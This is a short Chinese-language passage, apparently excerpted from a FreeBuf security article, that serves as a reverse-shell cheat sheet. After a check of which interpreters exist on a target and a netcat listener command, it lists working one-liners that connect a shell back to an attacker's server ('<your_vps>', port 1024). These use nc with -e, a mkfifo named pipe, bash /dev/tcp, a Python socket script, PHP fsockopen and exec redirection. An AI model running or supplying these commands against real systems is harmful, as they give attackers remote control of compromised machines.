节选自 https://www.freebuf.com/vuls/211847.html
>> whereis nc bash python exec php
nc: /usr/bin/nc /usr/share/man/man1/nc.1.gz
bash: /usr/bin/bash /usr/share/man/man1/bash.1.gz
python: /usr/bin/python /usr/bin/python2.7 /usr/bin/python2.7-config /usr/bin/python3.6 /usr/bin/python3.6m /usr/bin/python3.6-config /usr/bin/python3.6m-config /usr/bin/python3.6m-x86_64-config /usr/lib/python2.7 /usr/lib/python3.6 /usr/lib64/python2.7 /usr/lib64/python3.6 /etc/python /usr/local/lib/python3.6 /usr/include/python2.7 /usr/include/python3.6m /usr/share/man/man1/python.1.gz
exec: /usr/share/man/man1/exec.1.gz /usr/share/man/man1p/exec.1p.gz /usr/share/man/man3/exec.3.gz /usr/share/man/man3p/exec.3p.gz
php: /etc/php.ini
# 开启侦听
>> nc -n -vv -lp 80
用 nc 反弹,命令如下:
nc <your_vps> 1024 -e /bin/sh
某些目标的 nc 不支持 -e 参数,有两个解决思路,要么使用其他版本的 nc:
nc.traditional <your_vps> 1024 -e /bin/sh
要么配合命名管道进行反弹:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc <your_vps> 1024 >/tmp/f
用 bash 反弹:
/bin/bash -i >& /dev/tcp/<your_vps>/1024 0>&1
用 python 反弹:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<your_vps>",1024));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
用 PHP 反弹:
php -r '$sock=fsockopen("<your_vps>",1024);exec("/bin/sh -i <&3 >&3 2>&3");'
用 exec 反弹:
0<&196;exec 196<>/dev/tcp/<your_vps>/1024; sh <&196 >&196 2>&196